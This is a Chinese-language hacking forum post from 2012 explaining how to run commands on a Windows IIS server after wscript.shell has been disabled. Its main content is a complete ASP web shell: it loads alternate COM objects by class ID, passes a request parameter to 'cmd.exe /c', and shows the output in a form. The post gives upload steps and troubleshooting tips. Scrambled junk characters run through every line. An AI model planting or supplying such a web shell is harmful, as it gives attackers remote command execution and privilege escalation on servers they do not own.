可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。4 \' U7 j# y! M* J. W# s
一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。% D$ J$ H; u) P
要想让运行命令可以试试这种方法,成功率为五五之数。
$ ~1 a( x" K7 ]0 `8 w& N把下面代码复制:
" t% T) z; y7 b- _<object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>* F% ~9 L; h: l2 O, }6 Z
<%if err then%>
; X6 u/ ^) A9 g8 V- R<object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object>( r0 |/ m2 | a4 c
<%
2 G0 k0 y' m" @0 p$ {( T5 j' Rend if7 ]5 m6 s3 @1 c# \7 g
response.write("<textarea readonly cols=80 rows=20>")( a, C% Z4 N" m9 f
On Error Resume Next
/ ^' W8 K4 b2 O$ G' d5 u( iresponse.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall
0 K) m- f- @! n4 G9 K3 Nresponse.write("</textarea>")
! r3 }0 M7 i7 W7 z, s5 B1 Aresponse.write("<form method='post'>")
5 ?& y ^9 G& ~ V7 P+ Oresponse.write("<input type=text name='c' size=60><br>")
# f" w* B+ N5 e- t& }response.write("<input type=submit value='执行'></form>")
" j7 E8 p7 t9 q%>
$ f" r8 I4 N# i) ?" B
, V( _# u! d8 q7 Z; a+ A, N保存为一个asp文件,然后传到网站目录上去
& l- }# z/ Q1 ?5 j* D$ Z2 W% l运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。% q+ w/ P5 R# d4 Q( M5 W
我用此成功运行过cacls命令。
) q+ P" S: L6 `$ i9 k2 q" \* g% U, D; j
第二那就是运行时出错,可能限制某些代码执行 |
发表于 2012-9-15 14:36:53
收藏
支持
反对